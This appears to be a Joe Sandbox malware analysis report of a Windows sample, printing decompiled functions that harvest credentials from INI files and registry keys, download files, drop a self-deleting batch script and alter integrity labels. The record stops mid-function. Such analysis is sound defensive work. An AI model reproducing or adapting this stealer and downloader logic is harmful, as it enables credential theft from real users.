            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Wait$CloseHandleMultipleObjects$CreateMutexObjectSingleaccept
            • String ID:
            • API String ID: 38240579-0
            • Opcode ID: 1bb33c0d4e62535128bdae73a4527e72e61dca1b85d30bae2fd7be39ad9cba61
            • Instruction ID: 50ae931a654e9e3f08e77c0f7aec0db01f409702cd3cba05583d5fd671da2c37
            • Opcode Fuzzy Hash: 1bb33c0d4e62535128bdae73a4527e72e61dca1b85d30bae2fd7be39ad9cba61
            • Instruction Fuzzy Hash: 6A519C31008341ABC720EF65DC44D6FB7E8EBC4714F500A3EF990A26A1D7399D098B1A
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 95%
            			E00407C5C(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
            				short _v524;
            				char _v564;
            				short _v576;
            				short _v588;
            				short _v600;
            				short _v608;
            				short* _v612;
            				int _v616;
            				WCHAR* _v620;
            				WCHAR* _v624;
            				WCHAR* _v628;
            				WCHAR* _v632;
            				void* __edi;
            				void* __esi;
            				WCHAR* _t51;
            				WCHAR* _t52;
            				WCHAR* _t55;
            				void* _t60;
            				void* _t62;
            				void* _t64;
            				void* _t66;
            				long _t70;
            				WCHAR* _t71;
            				int _t75;
            				long _t79;
            				long _t82;
            				WCHAR* _t83;
            				void* _t84;
            				WCHAR* _t88;
            				WCHAR* _t89;
            				WCHAR* _t107;
            				WCHAR* _t108;
            				intOrPtr _t121;
            				signed int _t122;
            				void* _t124;
            
            				_t124 = (_t122 & 0xfffffff8) - 0x274;
            				if(E00415D45( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
            					L20:
            					return 1;
            				}
            				_t127 =  *__edx & 0x00000010;
            				if(( *__edx & 0x00000010) == 0) {
            					_t51 = HeapAlloc( *0x41bc68, 8, 0x20002);
            					_v624 = _t51;
            					__eflags = _t51;
            					if(_t51 == 0) {
            						goto L20;
            					}
            					_t52 = GetPrivateProfileStringW(0, 0, 0, _t51, 0xffff,  &_v524);
            					__eflags = _t52;
            					if(_t52 <= 0) {
            						L19:
            						E00410418(_v624);
            						goto L20;
            					}
            					_t9 =  &(_t52[0]); // 0x1
            					_t55 = E0041131B(_v624, _t9);
            					__eflags = _t55;
            					if(_t55 == 0) {
            						goto L19;
            					}
            					_t107 = HeapAlloc( *0x41bc68, 8, 0xc20);
            					_v620 = _t107;
            					__eflags = _t107;
            					if(_t107 == 0) {
            						goto L19;
            					} else {
            						_t12 =  &(_t107[0x1fe]); // 0x3fc
            						_v612 =  &(_t12[0xff]);
            						_v628 = _v624;
            						_t60 = 0x33;
            						E0040F369(_t60,  &_v608);
            						_t62 = 0x34;
            						E0040F369(_t62,  &_v588);
            						_t64 = 0x35;
            						E0040F369(_t64,  &_v576);
            						_t66 = 0x36;
            						E0040F369(_t66,  &_v600);
            						goto L9;
            						L17:
            						_t71 = E00411359(_v628, 1);
            						_v632 = _t71;
            						__eflags = _t71;
            						if(_t71 != 0) {
            							_t107 = _v620;
            							L9:
            							_t70 = GetPrivateProfileStringW(_v628,  &_v608, 0, _t107, 0xff,  &_v524);
            							__eflags = _t70;
            							if(_t70 > 0) {
            								_t75 = GetPrivateProfileIntW(_v628,  &_v588, 0x15,  &_v524);
            								_v616 = _t75;
            								__eflags = _t75 - 1 - 0xfffe;
            								if(_t75 - 1 <= 0xfffe) {
            									_t108 =  &(_t107[0xff]);
            									_t79 = GetPrivateProfileStringW(_v628,  &_v576, 0, _t108, 0xff,  &_v524);
            									__eflags = _t79;
            									if(_t79 > 0) {
            										_t32 =  &(_t108[0xff]); // 0x0
            										_t119 = _t32;
            										_t82 = GetPrivateProfileStringW(_v628,  &_v600, 0, _t32, 0xff,  &_v524);
            										__eflags = _t82;
            										if(_t82 > 0) {
            											_t83 = E00407B30(_v628, _t119);
            											__eflags = _t83;
            											if(_t83 > 0) {
            												_t120 =  &_v564;
            												_t84 = 0x2c;
            												E0040F369(_t84,  &_v564);
            												_push(_v616);
            												_t38 =  &(_t108[0xff]); // 0x0
            												_push(_v620);
            												_push(_t108);
            												_t109 = _v612;
            												_t88 = E004111A5(_t120, 0x311, _v612, _t120);
            												_t124 = _t124 + 0x14;
            												__eflags = _t88;
            												if(_t88 > 0) {
            													_t121 = _a4;
            													_t89 = E00410818(_t88, _t121, _t109);
            													__eflags = _t89;
            													if(_t89 != 0) {
            														_t42 = _t121 + 4;
            														 *_t42 =  &(( *(_t121 + 4))[0]);
            														__eflags =  *_t42;
            													}
            												}
            											}
            										}
            									}
            								}
            							}
            							goto L17;
            						} else {
            							E00410418(_v620);
            							goto L19;
            						}
            					}
            				} else {
            					E00407C02(_t127,  &_v524, _a4);
            					goto L20;
            				}
            			}

            APIs
              • Part of subcall function 00415D45: PathCombineW.SHLWAPI(?,?,004014A8,004038F5,?,?,?,00000000), ref: 00415D65
            • HeapAlloc.KERNEL32(00000008,00020002,?), ref: 00407CAD
            • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00407CD1
            • HeapAlloc.KERNEL32(00000008,00000C20), ref: 00407CFC
            • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00407D70
            • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00407D8A
            • GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00407DB8
            • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00407DD6
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: PrivateProfile$String$AllocHeap$CombinePath
            • String ID:
            • API String ID: 3432043379-0
            • Opcode ID: e67ffffbd66bc683c4423983df1ebdd3b12ff166b052b57e48d00f8ea7543a47
            • Instruction ID: 38683e3e3a5ab991a72e64398b02a8d7d3e935d5e1175a209ea4b792169ca162
            • Opcode Fuzzy Hash: e67ffffbd66bc683c4423983df1ebdd3b12ff166b052b57e48d00f8ea7543a47
            • Instruction Fuzzy Hash: 88518331908706ABE610EB65CC45FABB7EDEF84704F00483EBA54E32A1D774ED458B96
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 80%
            			E00414AF8(void* __ebx, void* __edi, char _a4) {
            				short _v24;
            				intOrPtr _v28;
            				char _v72;
            				short _v592;
            				char _v852;
            				char _v1392;
            				void* _t33;
            				signed int _t46;
            				char _t55;
            
            				if(E004158F8(L"bat",  &_v592) == 0) {
            					L7:
            					return 0;
            				}
            				CharToOemW( &_v592,  &_v852);
            				_push( &_v852);
            				if(E00411233( &_a4, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _a4) == 0xffffffff) {
            					L6:
            					E004158D7( &_v592);
            					goto L7;
            				}
            				_t33 = E004156EB( &_v592, _a4, _t29);
            				E00410418(_a4);
            				if(_t33 == 0) {
            					goto L6;
            				}
            				_push(__edi);
            				_push( &_v592);
            				if(E004111A5( &_v592, 0x10e,  &_v1392, L"/c \"%s\"") <= 0xffffffff || GetEnvironmentVariableW(L"ComSpec",  &_v592, 0x104) - 1 > 0x102) {
            					goto L6;
            				} else {
            					_t55 = 0x44;
            					E004104CB( &_v72,  &_v72, 0, _t55);
            					_v24 = 0;
            					_v72 = _t55;
            					_v28 = 1;
            					_t46 = E00411CDD( &_v592,  &_v1392, 0,  &_v72, 0);
            					asm("sbb eax, eax");
            					return  ~( ~_t46);
            				}
            			}

            APIs
              • Part of subcall function 004158F8: GetTempPathW.KERNEL32(000000F6,?), ref: 0041590F
            • CharToOemW.USER32 ref: 00414B28
              • Part of subcall function 004156EB: CreateFileW.KERNEL32(00414B12,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0041596B,00414B12,00000000,00000000,00414B12,?), ref: 00415705
              • Part of subcall function 004156EB: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0041596B,00414B12,00000000,00000000,00414B12,?), ref: 00415728
              • Part of subcall function 004156EB: CloseHandle.KERNEL32(00000000,?,0041596B,00414B12,00000000,00000000,00414B12,?), ref: 00415735
              • Part of subcall function 00410418: HeapFree.KERNEL32(00000000,00000000,00411C0D,00000000,?,?,?,?,0040373A,00000000,00403AF4), ref: 0041042B
            • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00414BAC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: File$CharCloseCreateEnvironmentFreeHandleHeapPathTempVariableWrite
            • String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$bat
            • API String ID: 1639923935-3344086482
            • Opcode ID: 57dfbf5cad99cfefd78f659124f5c6b3b1bc40c5ae48922e4b72889cf2e3f4fc
            • Instruction ID: fd7854fd5ad76f91cba6030d1c518433d330f7a5035e330c159c2953a5de0b63
            • Opcode Fuzzy Hash: 57dfbf5cad99cfefd78f659124f5c6b3b1bc40c5ae48922e4b72889cf2e3f4fc
            • Instruction Fuzzy Hash: FB21717194510CAEDB10EBA4CC45FEE77ACDB44304F6045A7B648E6190E678EBC98BA8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004120C3(void* __edi, void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
            				char _v5;
            				long _v12;
            				struct _OVERLAPPED* _v16;
            				long _v20;
            				long _t32;
            				void* _t37;
            				void* _t39;
            
            				_v5 = 0;
            				_t39 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
            				if(_t39 == 0xffffffff) {
            					L15:
            					return _v5;
            				}
            				_t37 = HeapAlloc( *0x41bc68, 8, 0x1004);
            				if(_t37 == 0) {
            					L13:
            					CloseHandle(_t39);
            					if(_v5 == 0) {
            						E004158D7(_a8);
            					}
            					goto L15;
            				}
            				_v16 = 0;
            				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
            					if(InternetReadFile(_a4, _t37, 0x1000,  &_v12) == 0) {
            						break;
            					}
            					if(_v12 == 0) {
            						FlushFileBuffers(_t39);
            						_v5 = 1;
            						break;
            					}
            					if(WriteFile(_t39, _t37, _v12,  &_v20, 0) == 0) {
            						break;
            					}
            					_t32 = _v12;
            					if(_t32 != _v20) {
            						break;
            					}
            					_v16 = _v16 + _t32;
            					if(_v16 <= _a12) {
            						continue;
            					}
            					break;
            				}
            				E00410418(_t37);
            				goto L13;
            			}

            APIs
            • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,00000000), ref: 004120E3
            • HeapAlloc.KERNEL32(00000008,00001004,?), ref: 00412102
            • WaitForSingleObject.KERNEL32(?,00000000), ref: 0041211A
            • InternetReadFile.WININET(00001000,00000000,00001000,?), ref: 00412134
            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0041214D
            • FlushFileBuffers.KERNEL32(00000000), ref: 0041216D
            • CloseHandle.KERNEL32(00000000), ref: 0041217E
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: File$AllocBuffersCloseCreateFlushHandleHeapInternetObjectReadSingleWaitWrite
            • String ID:
            • API String ID: 1233354954-0
            • Opcode ID: 53e5532f3dd45149540f489e0a98986dba8f7c36f2b84a45625c1263489394e2
            • Instruction ID: a930a72450fb15c563a02f30f5f67bdc1121a79ac7d8d44b00cac76f7d30080c
            • Opcode Fuzzy Hash: 53e5532f3dd45149540f489e0a98986dba8f7c36f2b84a45625c1263489394e2
            • Instruction Fuzzy Hash: 47218E35900258BFEB11AFA49D89FEF7B79EB44341F00806AF650F11A0C7B98D91CB28
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 95%
            			E00411B66(void* __ecx) {
            				long _v8;
            				void* _v12;
            				char* _t21;
            				signed char _t22;
            				DWORD* _t25;
            				void* _t35;
            
            				_t28 = 0;
            				if(OpenProcessToken(0xffffffff, 8,  &_v12) == 0) {
            					L15:
            					return _t28;
            				}
            				if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
            					L14:
            					CloseHandle(_v12);
            					goto L15;
            				} else {
            					_t16 = _v8;
            					if(_v8 == 0) {
            						goto L14;
            					}
            					_t35 = E004103ED(_t16);
            					if(_t35 == 0) {
            						L13:
            						goto L14;
            					}
            					if(GetTokenInformation(_v12, 0x19, _t35, _v8,  &_v8) != 0) {
            						_t21 = GetSidSubAuthorityCount( *_t35);
            						if(_t21 != 0) {
            							_t22 =  *_t21;
            							if(_t22 > 0) {
            								_t25 = GetSidSubAuthority( *_t35, (_t22 & 0x000000ff) - 1);
            								if(_t25 != 0) {
            									if( *_t25 >= 0x2000) {
            										asm("sbb bl, bl");
            										_t28 = 3;
            									} else {
            										_t28 = 1;
            									}
            								}
            							}
            						}
            					}
            					E00410418(_t35);
            					goto L13;
            				}
            			}

            APIs
            • OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,0040373A,00000000,00403AF4,?,00000000), ref: 00411B76
            • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,?,?,?,?,0040373A,00000000,00403AF4,?,00000000), ref: 00411B96
            • GetLastError.KERNEL32(?,?,?,?,0040373A,00000000,00403AF4,?,00000000), ref: 00411B9C
              • Part of subcall function 004103ED: HeapAlloc.KERNEL32(00000008,-00000004,00411BB4,00000000,?,?,?,?,0040373A,00000000,00403AF4,?,00000000), ref: 004103F9
            • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?,?,?,?,0040373A,00000000,00403AF4,?,00000000), ref: 00411BC7
            • GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,?,0040373A,00000000,00403AF4,?,00000000), ref: 00411BCF
            • GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,?,0040373A,00000000,00403AF4,?,00000000), ref: 00411BE6
            • CloseHandle.KERNEL32(?,?,?,?,?,0040373A,00000000,00403AF4,?,00000000), ref: 00411C11
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Token$AuthorityInformation$AllocCloseCountErrorHandleHeapLastOpenProcess
            • String ID:
            • API String ID: 2107185229-0
            • Opcode ID: 7035cd2eba30c678725945b1f2b85b36046f6b7e3e8dcd614a1afbf2070d6f95
            • Instruction ID: 20ea3f1884a4df6ef3ede4cce02250ca100d24f97680b0dc1803197af68f6ea1
            • Opcode Fuzzy Hash: 7035cd2eba30c678725945b1f2b85b36046f6b7e3e8dcd614a1afbf2070d6f95
            • Instruction Fuzzy Hash: 5B11D635280158BFEB105BA4CD84EEF7BADDB02355F100136F681E6170E3399EC5DAA8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004148B6(short* _a4) {
            				char _v5;
            				int _v12;
            				void* _v16;
            				void* _v20;
            				int _v24;
            				long _t18;
            
            				_v5 = 0;
            				_t18 = RegCreateKeyExW(0x80000001, L"SOFTWARE\\Microsoft", 0, 0, 0, 4, 0,  &_v16, 0);
            				_t33 = _t18;
            				if(_t18 == 0) {
            					_v12 = 0;
            					do {
            						E0041471A(6, 4, _t33, 2, _a4);
            						if(RegCreateKeyExW(_v16, _a4, 0, 0, 0, 3, 0,  &_v20,  &_v24) != 0) {
            							goto L4;
            						} else {
            							RegCloseKey(_v20);
            							if(_v24 == 1) {
            								_v5 = 1;
            							} else {
            								goto L4;
            							}
            						}
            						L7:
            						RegCloseKey(_v16);
            						goto L8;
            						L4:
            						_v12 = _v12 + 1;
            					} while (_v12 < 0x64);
            					goto L7;
            				}
            				L8:
            				return _v5;
            			}

            APIs
            • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 004148DE
              • Part of subcall function 0041471A: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0041483C
            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 00414910
            • RegCloseKey.ADVAPI32(?), ref: 00414919
            • RegCloseKey.ADVAPI32(?), ref: 00414933
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CloseCreate$CharUpper
            • String ID: SOFTWARE\Microsoft$d
            • API String ID: 1794619670-1227932965
            • Opcode ID: fb1ee502388fc22c8e2bbdb0aa46ac9935331f1cfdcdb0616543e26a9de008e5
            • Instruction ID: 96d033dfb5bdcef8659bfc8659b0b06969e6c8006d30fb3bbe8ba7a7a7caa0b1
            • Opcode Fuzzy Hash: fb1ee502388fc22c8e2bbdb0aa46ac9935331f1cfdcdb0616543e26a9de008e5
            • Instruction Fuzzy Hash: D51161B590020CBEEB119FE49D81EFFBB7CEB55388F104066F54172160D2759E859BB4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 45%
            			E00413904(intOrPtr _a4) {
            				struct _ACL* _v8;
            				struct _SECURITY_DESCRIPTOR* _v12;
            				int _v16;
            				int _v20;
            				void** _t11;
            				int _t16;
            				struct _ACL* _t18;
            
            				_t18 = 0;
            				E00411ADE(L"SeSecurityPrivilege");
            				_push(0);
            				_t11 =  &_v12;
            				_push(_t11);
            				_push(1);
            				_push(L"S:(ML;CIOI;NRNWNX;;;LW)");
            				L00416BAA();
            				if(_t11 != 0) {
            					_v8 = 0;
            					_t16 = GetSecurityDescriptorSacl(_v12,  &_v20,  &_v8,  &_v16);
            					if(_t16 != 0) {
            						__imp__SetNamedSecurityInfoW(_a4, 1, 0x10, 0, 0, 0, _v8);
            						if(_t16 == 0) {
            							_t18 = 1;
            						}
            					}
            					LocalFree(_v12);
            				}
            				return _t18;
            			}

            APIs
              • Part of subcall function 00411ADE: GetCurrentThread.KERNEL32 ref: 00411AEE
              • Part of subcall function 00411ADE: OpenThreadToken.ADVAPI32(00000000), ref: 00411AF5
              • Part of subcall function 00411ADE: OpenProcessToken.ADVAPI32(000000FF,00000020,?), ref: 00411B07
            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 00413923
            • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000,S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000,SeSecurityPrivilege,00000000), ref: 0041393E
            • SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 00413955
            • LocalFree.KERNEL32(00000000), ref: 00413964
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Security$Descriptor$OpenThreadToken$ConvertCurrentFreeInfoLocalNamedProcessSaclString
            • String ID: S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
            • API String ID: 3555451682-1937014404
            • Opcode ID: 35f515591c377536809d96ac273fc5f255dedd1977d9bcec86bffdb440d6c78d
            • Instruction ID: b4713ee99fad8ffcfa99ee7d091a640babbd7a48f3e5c89b33af728e9fe2cc7e
            • Opcode Fuzzy Hash: 35f515591c377536809d96ac273fc5f255dedd1977d9bcec86bffdb440d6c78d
            • Instruction Fuzzy Hash: DDF08CB564020CBEEF009FA08D81EEF7B7CAB04744F000066FA01B11A0D6B59B849A28
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 96%
            			E00408BFC(char* __ecx) {
            				int _v8;
            				void* _v12;
            				signed int _v16;
            				int _v20;
            				intOrPtr _v24;
            				void* _v28;
            				intOrPtr _v32;
            				char _v36;
            				void* _v40;
            				intOrPtr _v44;
            				intOrPtr _v48;
            				intOrPtr _v52;
            				char* _v56;
            				char _v68;
            				char _v92;
            				char _v100;
            				char _v120;
            				char _v140;
            				char _v160;
            				char _v224;
            				char _v292;
            				short _v812;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t73;
            				void* _t74;
            				void* _t76;
            				void* _t82;
            				void* _t84;
            				void* _t86;
            				void* _t88;
            				intOrPtr _t90;
            				void* _t97;
            				int _t108;
            				int _t116;
            				int _t120;
            				void* _t121;
            				signed int _t123;
            				void* _t125;
            				void* _t128;
            				void* _t131;
            				int _t138;
            				intOrPtr _t141;
            				char* _t144;
            				signed int _t148;
            				void* _t150;
            				void* _t151;
            
            				_t134 = __ecx;
            				_t73 = HeapAlloc( *0x41bc68, 8, 0xc0c);
            				_t131 = _t73;
            				_t138 = 0;
            				_v28 = _t131;
            				if(_t131 == 0) {
            					return _t73;
            				} else {
            					_t74 = 0x5a;
            					E0040F369(_t74,  &_v224);
            					_t144 =  &_v292;
            					_t76 = 0x5b;
            					E0040F369(_t76, _t144);
            					_v56 =  &_v224;
            					_v52 = _t144;
            					E004104CB( &_v36,  &_v36, 0, 8);
            					_t82 = 0x5c;
            					E0040F369(_t82,  &_v120);
            					_t84 = 0x5d;
            					E0040F369(_t84,  &_v160);
            					_t86 = 0x5e;
            					E0040F369(_t86,  &_v68);
            					_t148 =  &_v140;
            					_t88 = 0x5f;
            					E0040F369(_t88, _t148);
            					_t12 = _t131 + 0x3fc; // 0x0
            					_t90 = _t12;
            					_v24 = _t90;
            					_v44 = _t131 + 0x1fe;
            					_v48 = _t90 + 0x1fe;
            					_v16 = 0;
            					do {
            						if(RegOpenKeyExW(0x80000001,  *(_t150 + _v16 * 4 - 0x34), _t138, 8,  &_v12) != 0) {
            							goto L22;
            						}
            						_v20 = _t138;
            						_v8 = 0x104;
            						if(RegEnumKeyExW(_v12, _t138,  &_v812,  &_v8, _t138, _t138, _t138, _t138) != 0) {
            							L21:
            							RegCloseKey(_v12);
            							goto L22;
            						} else {
            							goto L4;
            						}
            						do {
            							L4:
            							_v20 = _v20 + 1;
            							_t108 = E004143B6(_v12, 0xff, _t134, _v28,  &_v812,  &_v120);
            							_t148 = _t148 | 0xffffffff;
            							_v8 = _t108;
            							if(_t108 != _t148 && _t108 > 0) {
            								_t140 = _v44;
            								_t116 = E004143B6(_v12, 0xff, _t134, _v44,  &_v812,  &_v160);
            								_v8 = _t116;
            								if(_t116 == _t148 || _t116 <= 0) {
            									_t120 = E004143B6(_v12, 0xff, _t134, _t140,  &_v812,  &_v68);
            									_v8 = _t120;
            									if(_t120 == _t148 || _t120 <= 0) {
            										goto L19;
            									} else {
            										goto L10;
            									}
            								} else {
            									L10:
            									_t121 = _v12;
            									_t134 =  &_v812;
            									_v40 = _t121;
            									if(RegOpenKeyExW(_t121,  &_v812, 0, 1,  &_v40) != 0) {
            										_t123 = _t148;
            									} else {
            										_t148 =  &_v40;
            										_t123 = E0041449E(_t148,  &_v140, _t122, _v24, 0xff);
            									}
            									_v8 = _t123;
            									if(_t123 != 0xffffffff && _t123 > 0) {
            										_t141 = _v24;
            										if(E00408BA1(_t141) > 0) {
            											_t148 =  &_v100;
            											_t125 = 0x2d;
            											E0040F369(_t125, _t148);
            											_push(_v28);
            											_push(_t141);
            											_push(_v44);
            											_t142 = _v48;
            											_t128 = E004111A5(_t148, 0x307, _v48, _t148);
            											_t151 = _t151 + 0x10;
            											if(_t128 > 0) {
            												_t134 =  &_v36;
            												if(E00410818(_t128,  &_v36, _t142) != 0) {
            													_v32 = _v32 + 1;
            												}
            											}
            										}
            									}
            									goto L19;
            								}
            							}
            							L19:
            							_v8 = 0x104;
            						} while (RegEnumKeyExW(_v12, _v20,  &_v812,  &_v8, 0, 0, 0, 0) == 0);
            						_t138 = 0;
            						goto L21;
            						L22:
            						_v16 = _v16 + 1;
            					} while (_v16 < 2);
            					E00410418(_v28);
            					_t172 = _v32 - _t138;
            					if(_v32 > _t138) {
            						_t149 =  &_v92;
            						_t97 = 0x60;
            						E0040F369(_t97,  &_v92);
            						E0040D929(_t149, _v36, 0x307, _t172, _t149);
            					}
            					return E00410418(_v36);
            				}
            			}

            APIs
            • HeapAlloc.KERNEL32(00000008,00000C0C,?,?,00000001), ref: 00408C15
            • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,00000003,?,00000000,00000008,?,?,00000001), ref: 00408CC7
            • RegEnumKeyExW.ADVAPI32 ref: 00408CF2
            • RegCloseKey.ADVAPI32(00000003,?,?,00000001), ref: 00408E33
              • Part of subcall function 004143B6: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,?,0040F571,?,00000017,.exe,00000000,00000000), ref: 004143C9
            • RegOpenKeyExW.ADVAPI32(00000003,?,00000000,00000001,?,?,?,?,?,?,?,?,?,00000001), ref: 00408D8F
            • RegEnumKeyExW.ADVAPI32 ref: 00408E20
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Open$Enum$AllocCloseHeap
            • String ID:
            • API String ID: 3287537325-0
            • Opcode ID: 059b96b5ef44858d8de0c1c5b99e699ab93831f2d3e54953b34ccb58eba07c88
            • Instruction ID: 9762fbf456c7bca11fcb55ef95ac10350905a677f22067ae0a671d08f93af3bc
            • Opcode Fuzzy Hash: 059b96b5ef44858d8de0c1c5b99e699ab93831f2d3e54953b34ccb58eba07c88
            • Instruction Fuzzy Hash: 69715E71D00218ABDF11DBA5CD45ADFBBB8EB48714F10447AEA04F3291DB789A858BA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0040C545(void* __eflags, char* _a4, intOrPtr _a8, signed int _a12, signed int* _a16) {
            				char _v5;
            				char _v12;
            				signed int _v16;
            				char _v20;
            				char _v24;
            				long _v28;
            				void* __edi;
            				void* __esi;
            				signed int _t55;
            				void* _t58;
            				signed int* _t59;
            				intOrPtr _t60;
            				signed int _t61;
            				signed int* _t62;
            				signed int _t71;
            				char* _t84;
            				short* _t91;
            				void* _t96;
            				intOrPtr _t98;
            				intOrPtr* _t100;
            				signed int _t104;
            				struct _GOPHER_FIND_DATAA _t108;
            
            				_v16 = _v16 | 0xffffffff;
            				EnterCriticalSection(0x41aa60);
            				_t100 = _a4;
            				_t55 = E0040BDA6( *_t100);
            				if(_t55 == 0xffffffff) {
            					L35:
            					LeaveCriticalSection(0x41aa60);
            					return _v16;
            				}
            				_t98 =  *0x41aa78; // 0x0
            				_t58 = _t55 * 0x24 + _t98;
            				if( *((intOrPtr*)(_t58 + 0x10)) <= 0) {
            					goto L35;
            				}
            				_t96 = _t58;
            				if( *((intOrPtr*)(_t96 + 0x10)) != 1 || ( *( *(_t96 + 0xc)) & 0x00000003) == 0) {
            					_t59 = _a16;
            					if(_t59 != 0) {
            						 *_t59 =  *_t59 & 0x00000000;
            					}
            					if( *((intOrPtr*)(_t96 + 0x18)) != 0xffffffff) {
            						L22:
            						_t60 =  *((intOrPtr*)(_t96 + 0x18));
            						if(_t60 != 0xffffffff && _v16 == 0xffffffff) {
            							_t61 = _t60 -  *((intOrPtr*)(_t96 + 0x1c));
            							_t104 = _t61;
            							if(_t61 != 0) {
            								if(_a8 == 0) {
            									_a12 = E0041185E(0x2000, 0x1000);
            								}
            								if(_a12 < _t104) {
            									_t104 = _a12;
            								}
            								if(_a8 != 0) {
            									E00410454(_a8,  *((intOrPtr*)(_t96 + 0x14)) +  *((intOrPtr*)(_t96 + 0x1c)), _t104);
            									 *((intOrPtr*)(_t96 + 0x1c)) =  *((intOrPtr*)(_t96 + 0x1c)) + _t104;
            								}
            							}
            							_t62 = _a16;
            							if(_t62 != 0) {
            								 *_t62 = _t104;
            							}
            							_v16 = 1;
            						}
            						goto L34;
            					}
            					LeaveCriticalSection(0x41aa60);
            					_v5 = E0040C423( &_v20,  *_t100,  *((intOrPtr*)(_t96 + 4)),  &_v12);
            					EnterCriticalSection(0x41aa60);
            					if(_v5 == 0) {
            						L21:
            						_v16 = _v16 & 0x00000000;
